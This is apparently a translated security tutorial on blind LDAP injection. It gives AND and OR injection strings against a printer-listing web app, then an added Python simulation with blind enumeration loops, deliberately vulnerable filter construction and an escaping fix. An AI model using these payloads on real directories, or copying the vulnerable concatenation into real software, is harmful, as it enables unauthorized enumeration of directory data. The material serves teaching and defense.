The first thing to declare is that this article is purely the ignorant view of a small developer without foresight or knowledge, and is intended only as a reference on Web system security.
Part of the content comes from the web and from translation.
1. A few preliminary words
Suppose an attacker can infer information from the server's response even though the application returns no explicit error message: the code that builds the LDAP filter still either produces a valid result or fails. The attacker can exploit this behaviour by asking the server questions whose answer is either "true" or "false". This is called a blind injection attack. Blind LDAP injection is slow but easy to implement, because it rests on binary logic that lets the attacker extract information from the LDAP directory one yes/no answer at a time.
2. LDAP AND blind injection
Suppose a Web application lists the available Epson printers from an LDAP directory, returns no error messages, and builds the following filter, where the object class value (printer here) is taken from the request:
(&(objectclass=printer)(type=epson*))
With this query, if an Epson printer is available its icon is displayed to the client; otherwise no icon appears. If the attacker now injects, in place of the object class value, the string
*)(objectclass=*))(&(objectclass=void
the Web application builds the following query:
(&(objectclass=*)(objectclass=*))(&(objectclass=void)(type=epson*))
Only the first LDAP filter is processed (whether the text trailing it is silently ignored or rejected depends on the directory server's filter parser; the attack assumes it is ignored):
(&(objectclass=*)(objectclass=*))
This filter always returns entries, because objectclass=* matches every object, so the printer icon is always displayed. An icon on the page means the answer is true; no icon means false.
From here the blind technique is straightforward. For example, the attacker can construct the following injections:
(&(objectclass=*)(objectclass=users))(&(objectclass=foo)(type=epson*))
(&(objectclass=*)(objectclass=resources))(&(objectclass=foo)(type=epson*))
These injections let the attacker guess which object classes exist in the LDAP directory service. If the response page contains at least one printer icon, the guessed object class exists; if it does not exist, or the application's account has no access to it, no icon appears.
Blind LDAP injection thus lets an attacker enumerate the directory's contents through a sequence of true/false questions.
3. LDAP OR blind injection
In this case the logic used to infer the desired information is the inverse of the AND case, because the OR operator is used. Following the same example, the injection in an OR environment is:
(|(objectclass=void)(objectclass=void))(&(objectclass=void)(type=epson*))
This LDAP query returns no object from the directory service, so no printer icon is shown to the client (false). If any icon does appear in the response page, the answer is true. The attacker can then inject the following LDAP filters to gather information:
(|(objectclass=void)(objectclass=users))(&(objectclass=void)(type=epson*))
(|(objectclass=void)(objectclass=resources))(&(objectclass=void)(type=epson*))
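The AND case of section 2 and the OR case of section 3, as one added example that is not part of the original post: a small Python simulation with a constructed four-entry directory, a minimal RFC 4515 filter evaluator that, as the post assumes, processes only the first complete filter, the vulnerable filter construction, the two blind enumeration loops, and (going beyond the post) the escaping fix. Every entry, attribute name and function name here is an assumption made for illustration; no real LDAP server or library is involved.

```python
"""Simulation of the blind LDAP injection described above, AND and OR variants.
Added example, not code from the original post: the directory entries, the
attribute names and every function name are constructed for illustration.
The evaluator covers just enough of RFC 4515 to run the post's filters."""

import re

# Constructed sample directory standing in for the LDAP server's data.
DIRECTORY = [
    {"objectclass": "printer", "type": "epson-wf"},
    {"objectclass": "printer", "type": "hp-laser"},
    {"objectclass": "users", "type": "person"},
    {"objectclass": "resources", "type": "room"},
]


def _split_items(body):
    """Split the body of (&...) / (|...) into its top-level (...) sub-filters."""
    items, depth, start = [], 0, 0
    for i, ch in enumerate(body):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                items.append(body[start:i + 1])
    return items


def _unescape(text):
    """Decode RFC 4515 hex escapes (e.g. \\2a -> '*') into literal characters."""
    return re.sub(r"\\([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)


def match(entry, flt):
    """True if the entry satisfies one well-formed filter such as (&(a=1)(b=x*))."""
    inner = flt[1:-1]                       # drop the outer parentheses
    if inner[0] == "&":
        return all(match(entry, f) for f in _split_items(inner[1:]))
    if inner[0] == "|":
        return any(match(entry, f) for f in _split_items(inner[1:]))
    if inner[0] == "!":
        return not match(entry, _split_items(inner[1:])[0])
    attr, _, value = inner.partition("=")
    actual = entry.get(attr.strip().lower())
    if actual is None:                      # (attr=*) is a presence test: a missing attribute never matches
        return False
    # An unescaped '*' is a wildcard; everything else, decoded escapes included, is literal.
    pattern = ".*".join(re.escape(_unescape(part)) for part in value.split("*"))
    return re.fullmatch(pattern, actual, re.IGNORECASE) is not None


def first_filter(text):
    """Return the first complete filter and whatever trails it. Real servers differ on
    whether trailing text is ignored or rejected; the post (and this simulation) assumes ignored."""
    depth = 0
    for i, ch in enumerate(text):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return text[:i + 1], text[i + 1:]
    raise ValueError("unbalanced filter: " + text)


def search(flt):
    """The simulated directory search: evaluates only the first filter."""
    head, _trailing = first_filter(flt)
    return [e for e in DIRECTORY if match(e, head)]


# Vulnerable application code: the client-supplied object class is concatenated in.
def build_filter_vulnerable(objectclass, brand="epson"):
    return "(&(objectclass=%s)(type=%s*))" % (objectclass, brand)


def build_filter_or_vulnerable(objectclass, brand="epson"):
    return "(|(objectclass=%s)(type=%s*))" % (objectclass, brand)


def icon_shown(objectclass):
    """The only signal the attacker receives: did the page show at least one icon?"""
    return len(search(build_filter_vulnerable(objectclass))) > 0


def blind_enumerate_and(candidates):
    """AND environment: inject '*)(objectclass=X))(&(objectclass=void' so the server
    evaluates (&(objectclass=*)(objectclass=X)); an icon means X exists."""
    return [c for c in candidates
            if icon_shown("*)(objectclass=%s))(&(objectclass=void" % c)]


def blind_enumerate_or(candidates):
    """OR environment: inject 'void)(objectclass=X))(&(objectclass=void' so the server
    evaluates (|(objectclass=void)(objectclass=X)); any result means X exists."""
    payload = "void)(objectclass=%s))(&(objectclass=void"
    return [c for c in candidates if search(build_filter_or_vulnerable(payload % c))]


# The fix the post does not show: escape filter metacharacters (RFC 4515) before concatenating.
def escape_filter_value(value):
    table = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
    return "".join(table.get(ch, ch) for ch in value)


def build_filter_safe(objectclass, brand="epson"):
    return "(&(objectclass=%s)(type=%s*))" % (escape_filter_value(objectclass),
                                             escape_filter_value(brand))


if __name__ == "__main__":
    print(blind_enumerate_and(["users", "resources", "groups"]))  # ['users', 'resources']
    print(blind_enumerate_or(["users", "resources", "groups"]))   # ['users', 'resources']
    print(search(build_filter_safe("*)(objectclass=users))(&(objectclass=void")))  # []
```

Run stand-alone, it prints the object classes the attacker recovers in each environment and shows that the escaped filter returns nothing for the same payload, because the injected parentheses and wildcard arrive at the server as literal characters. Against a real directory the only change is replacing search() with an actual search call; remember that real servers differ on how they treat text after the first complete filter.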
Watch your door - Attacking data storage (6) - LDAP blind injection